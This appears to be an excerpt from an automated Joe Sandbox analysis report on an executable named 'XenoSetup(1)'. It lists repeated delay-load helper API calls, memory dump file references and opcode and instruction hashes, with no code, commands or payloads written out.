                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 97679990c1f561b6b9d6985a503085da95f6a324b2d205699f57360f20b7c4b5
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 97679990c1f561b6b9d6985a503085da95f6a324b2d205699f57360f20b7c4b5
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c787e8bcdc23c8c0aa86ae7fe1374ceb5327f037cd6517df53cc814a40c26ce7
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: c787e8bcdc23c8c0aa86ae7fe1374ceb5327f037cd6517df53cc814a40c26ce7
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 17a0fee477acf33820df0ee1f998a4220da95cf1b2c0581b3e84cd8b2a2464ed
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 17a0fee477acf33820df0ee1f998a4220da95cf1b2c0581b3e84cd8b2a2464ed
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 2d3ca26e38f3fa6f9004f72da0aa62681c3667c2aa8b4f70fbdf16e17f159d03
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 2d3ca26e38f3fa6f9004f72da0aa62681c3667c2aa8b4f70fbdf16e17f159d03
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 5b0a6cae135ff9e0e2fdf6a6bbc6465396c369df283dadd15c68fc9d61fd99b9
                                                                                      • Instruction ID: 20d1adad51d5084b0534c49e16e0e486da895331e82cf00c237e57f1df9df22c
                                                                                      • Opcode Fuzzy Hash: 5b0a6cae135ff9e0e2fdf6a6bbc6465396c369df283dadd15c68fc9d61fd99b9
                                                                                      • Instruction Fuzzy Hash: 9AA012E21942453C300821011D06C37020CC8C0F20330441DF511940745C4418002432
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 5a4135b0cd41e925a13bf417340f8b2bb193d3663e37369f2a5593afc14a8982
                                                                                      • Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
                                                                                      • Opcode Fuzzy Hash: 5a4135b0cd41e925a13bf417340f8b2bb193d3663e37369f2a5593afc14a8982
                                                                                      • Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 1bdd1992f27cabee0708f049aaf47f3dbd4fc24140eefe6de70720c3edd0f09a
                                                                                      • Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
                                                                                      • Opcode Fuzzy Hash: 1bdd1992f27cabee0708f049aaf47f3dbd4fc24140eefe6de70720c3edd0f09a
                                                                                      • Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 963a464895229a31d9893f3407fd7a0f66622477bdc7287608ab2eb6c8b615a7
                                                                                      • Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
                                                                                      • Opcode Fuzzy Hash: 963a464895229a31d9893f3407fd7a0f66622477bdc7287608ab2eb6c8b615a7
                                                                                      • Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: fd5f21a4ca583290281d81e4e6d8989fc3f28befb62bdcde750324fe8ed06027
                                                                                      • Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
                                                                                      • Opcode Fuzzy Hash: fd5f21a4ca583290281d81e4e6d8989fc3f28befb62bdcde750324fe8ed06027
                                                                                      • Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 8e74d8b8b17308c44455fab9afaa70b0e508701297c03530b35b42a8cd7a48c3
                                                                                      • Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
                                                                                      • Opcode Fuzzy Hash: 8e74d8b8b17308c44455fab9afaa70b0e508701297c03530b35b42a8cd7a48c3
                                                                                      • Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE580
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: a136c979cfa69bc14a8c45889efa40a62a943f30040943ed023d79cb81132f2a
                                                                                      • Instruction ID: 96b6b904cd8c7aa22c1bb75306490a47b2c9326f60d78507916dd4935919af56
                                                                                      • Opcode Fuzzy Hash: a136c979cfa69bc14a8c45889efa40a62a943f30040943ed023d79cb81132f2a
                                                                                      • Instruction Fuzzy Hash: A5A012C21982097C300421511D02C37010CC8C4F60334481DF502C8074A84418102430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE580
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 691ced74ab69747045207ce1d541026605617e8b85109c2606610ced74be5661
                                                                                      • Instruction ID: 96b6b904cd8c7aa22c1bb75306490a47b2c9326f60d78507916dd4935919af56
                                                                                      • Opcode Fuzzy Hash: 691ced74ab69747045207ce1d541026605617e8b85109c2606610ced74be5661
                                                                                      • Instruction Fuzzy Hash: A5A012C21982097C300421511D02C37010CC8C4F60334481DF502C8074A84418102430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE580
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 5a1d3075d8e3b5630638d8e39adb5079b68bfce2442fb86efceda20f9f52023c
                                                                                      • Instruction ID: 765b45e09c3c6b8df23b622de953ce2bb9477bee1c1e5f32503632fff884a578
                                                                                      • Opcode Fuzzy Hash: 5a1d3075d8e3b5630638d8e39adb5079b68bfce2442fb86efceda20f9f52023c
                                                                                      • Instruction Fuzzy Hash: 41A012C21D42083C300421611D02C37050CC8C0F21334451DF501C8074A84418102430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: da51888f44360b5599d1d821925260737f332e85ca0394c8f2865876391b379b
                                                                                      • Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
                                                                                      • Opcode Fuzzy Hash: da51888f44360b5599d1d821925260737f332e85ca0394c8f2865876391b379b
                                                                                      • Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 25bdb14fee60e4ef7081919bbf33bfdfd108a4f10fd4b0b3518e05c1b49621c1
                                                                                      • Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
                                                                                      • Opcode Fuzzy Hash: 25bdb14fee60e4ef7081919bbf33bfdfd108a4f10fd4b0b3518e05c1b49621c1
                                                                                      • Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
